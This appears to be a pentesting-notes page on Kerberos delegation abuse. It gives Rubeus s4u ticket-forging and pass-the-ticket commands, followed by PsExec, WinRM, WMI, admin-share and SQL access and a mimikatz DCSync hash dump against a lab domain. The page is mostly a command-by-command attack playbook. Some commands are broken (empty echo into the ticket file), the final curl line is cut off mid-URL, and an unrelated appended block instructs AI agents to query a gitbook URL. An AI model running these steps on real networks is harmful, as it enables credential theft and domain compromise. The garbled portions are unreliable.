# Service Tickets and Abuses **1. Service Ticket for HOST (Lateral Movement with PsExec, wmi, winrm)** The `HOST` service ticket can be used for lateral movement by accessing remote services like PsExec. PsExec allows you to run commands on remote systems. **Steps:** * **Obtain the HOST service ticket:** 
C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:host /user:sql-1$ /ticket:<base64TGT> /nowrap
* **Save the service ticket to a file:** ```powershell C:\Users\Alex> echo > C:\Users\Alex\Desktop\ticket.kirbi ``` * **Inject the ticket using Rubeus:** ```powershell C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbi ``` * **Use PsExec to run commands on the target system:** ```powershell C:\Users\Alex> psexec.exe \\dc.dev.dhitalcorp.local cmd ``` * **Access WinRM:** 
C:\Users\Alex> Enter-PSSession -ComputerName dc.dev.dhitalcorp.local -Credential (New-Object System.Management.Automation.PSCredential('dev\alex', (ConvertTo-SecureString "password" -AsPlainText -Force)))
* **Access WMI:** 
C:\Users\Alex> Get-WmiObject -Class Win32_OperatingSystem -ComputerName dc.dev.dhitalcorp.local -Credential (New-Object System.Management.Automation.PSCredential('dev\alex', (ConvertTo-SecureString "password" -AsPlainText -Force)))
**2. Service Ticket for LDAP (DC Sync Attack)** The `LDAP` service ticket can be used for Directory Replication Service (DC Sync) attacks. This allows you to replicate password hashes from a Domain Controller. **Steps:** * **Obtain the LDAP service ticket:** 
C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:ldap /user:sql-1$ /ticket:<base64TGT> /nowrap
* **Save the service ticket to a file:** ```powershell C:\Users\Alex> echo > C:\Users\Alex\Desktop\ticket.kirbi ``` * **Inject the ticket using Rubeus:** ```powershell C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbi ``` * **Perform the DC Sync attack using mimikatz:** ```powershell C:\Users\Alex> mimikatz.exe mimikatz # lsadump::dcsync /user:dc$ ``` **3. Service Ticket for CIFS (File Share Access)** The `CIFS` service ticket allows you to access file shares on a remote system, enabling you to read, write, or modify files on the target. **Steps:** * **Obtain the CIFS service ticket:** 
C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /user:sql-1$ /ticket:<base64TGT> /nowrap
* **Save the service ticket to a file:** 
C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbi
* **Inject the ticket using Rubeus:** 
C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbi
* **Access the file share:** 
C:\Users\Alex> net use \\dc.dev.dhitalcorp.local\c$
**4. Service Ticket for MSSQLSvc (SQL Server Access)** The `MSSQLSvc` service ticket can be used to access SQL Server instances, allowing you to run queries and potentially extract data. **Steps:** * **Obtain the MSSQLSvc service ticket:** 
C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:mssqlsvc /user:sql-1$ /ticket:<base64TGT> /nowrap
* **Save the service ticket to a file:** 
C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbi
* **Inject the ticket using Rubeus:** 
C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbi
* **Access the SQL Server:** 
C:\Users\Alex> sqlcmd -S dc.dev.dhitalcorp.local -d master -U alex -P <password>
**5. Service Ticket for HTTP (Web Service Access)** The `HTTP` service ticket can be used to access web applications running on the target system, allowing for interactions with the web services as the impersonated user. **Steps:** * **Obtain the HTTP service ticket:** 
C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:http /user:sql-1$ /ticket:<base64TGT> /nowrap
* **Save the service ticket to a file:** 
C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbi
* **Inject the ticket using Rubeus:** 
C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbi
* **Access the web application:** You can use tools like `curl` or a browser to access the web service: 
C:\Users\Alex> curl -H "Authorization: Negotiate <base64ServiceTicket>" http://dc.dev.dhi
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://alexdhital.gitbook.io/pentesting-notes/active-directory-pentesting/service-tickets-and-abuses.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.